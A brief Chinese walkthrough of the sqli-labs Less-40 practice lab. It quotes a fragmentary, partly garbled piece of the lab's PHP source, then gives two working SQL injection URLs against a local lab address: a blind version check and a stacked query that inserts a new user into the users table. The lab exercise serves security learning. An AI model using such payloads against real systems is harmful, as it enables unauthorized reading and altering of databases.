sqli-Labs————less-40

Less-40

查看源代码：

Welcome    Dhakkan 




';	
            printf("Your Username is : %s", $row[1]);
            echo "
";
            printf("Your Password is : %s", $row[2]);
            echo "
";
            echo "";
        }
//            mysqli_free_result($result);
    }
        /* print divider */
    if (mysqli_more_results($con1))
    {
            //printf("-----------------\n");
    }
     //while (mysqli_next_result($con1));
}
/* close connection */
mysqli_close($con1);
}
	else { echo "Please input the ID as parameter with numeric value";}
?>
 






 

根据SQL语句我们直接给出以下payload：

http://192.168.11.136/sqli-labs/Less-40?id=-1')or left(version(),1)=5 --+

堆叠注入：

http://192.168.11.136/sqli-labs/Less-40?id=1');insert into users(id,username,password) values ('101','hps','111')#